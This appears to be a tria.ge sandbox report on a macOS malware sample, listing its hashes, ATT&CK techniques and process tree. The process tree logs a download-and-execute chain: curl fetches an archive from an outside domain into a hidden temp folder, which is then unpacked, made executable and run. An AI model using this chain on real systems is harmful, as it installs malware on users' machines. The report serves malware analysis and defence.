Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    93s
  • max time network
    160s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241101-en
  • resource tags

    arch:amd64arch:i386image:macos-20241101-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
  • submitted
    17/02/2025, 18:06

General

  • Target

    Macos-Malware-Samples-main/00dba8d8d361fae719a6b19e95be78674644466d7956255166d5200df4e6cad8

  • Size

    48KB

  • MD5

    4f14f61b4080df48f0595f007d6b4ce2

  • SHA1

    851871658beb0a9b5a031fd884ccc62732ed4b86

  • SHA256

    00dba8d8d361fae719a6b19e95be78674644466d7956255166d5200df4e6cad8

  • SHA512

    748184b16144fe43ec94815d9be30053dff9b5eb0fdd132755e1eb3b331c22fce4032c34008fa2687c51d2992bf1608f604b68ddf937e10ff21ba9f60ea731d2

  • SSDEEP

    1536:bFF1Bn3+enFkTV2Py+bGd6kidOdW55XC:D1Bn3+cFkTV6xbmqd7C

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol 1 TTPs 1 IoCs

    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

  • File Permission 1 TTPs

    Adversaries may modify file permissions/attributes to evade access control lists (ACLs) and access protected files.

  • Resource Forking 1 TTPs 1 IoCs

    Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

  • Command and Scripting Interpreter 1 TTPs

    Adversaries may abuse Unix shell commands and scripts for execution.

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/00dba8d8d361fae719a6b19e95be78674644466d7956255166d5200df4e6cad8\""
    1⤵
      PID:490
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/00dba8d8d361fae719a6b19e95be78674644466d7956255166d5200df4e6cad8\""
      1⤵
        PID:490
      • /usr/bin/sudo
        sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/00dba8d8d361fae719a6b19e95be78674644466d7956255166d5200df4e6cad8
        1⤵
          PID:490
          • /bin/zsh
            /bin/zsh -c /Users/run/Macos-Malware-Samples-main/00dba8d8d361fae719a6b19e95be78674644466d7956255166d5200df4e6cad8
            2⤵
              PID:491
            • /Users/run/Macos-Malware-Samples-main/00dba8d8d361fae719a6b19e95be78674644466d7956255166d5200df4e6cad8
              /Users/run/Macos-Malware-Samples-main/00dba8d8d361fae719a6b19e95be78674644466d7956255166d5200df4e6cad8
              2⤵
                PID:491
                • /usr/bin/python
                  /usr/bin/python -
                  3⤵
                    PID:492
                  • /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
                    /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python -
                    3⤵
                      PID:492
                      • /usr/bin/curl
                        /usr/bin/curl -qsL -m 1200 "http://bghui.storeyourstreams.xyz/tr/ioffers.tar.gz?ts=1739844744" -o /private/tmp/.mmstmp//stmp.tar.gz
                        4⤵
                          PID:493
                  • /bin/sh
                    sh -c "/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/"
                    1⤵
                      PID:494
                    • /bin/bash
                      sh -c "/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/"
                      1⤵
                        PID:494
                      • /usr/bin/tar
                        /usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/
                        1⤵
                          PID:494
                        • /bin/sh
                          sh -c "/bin/chmod +x '/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                          1⤵
                            PID:495
                          • /bin/bash
                            sh -c "/bin/chmod +x '/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                            1⤵
                              PID:495
                            • /bin/chmod
                              /bin/chmod +x /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
                              1⤵
                                PID:495
                              • /bin/sh
                                sh -c "'/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                                1⤵
                                  PID:496
                                • /bin/bash
                                  sh -c "'/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                                  1⤵
                                    PID:496
                                  • /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
                                    /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
                                    1⤵
                                      PID:496

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads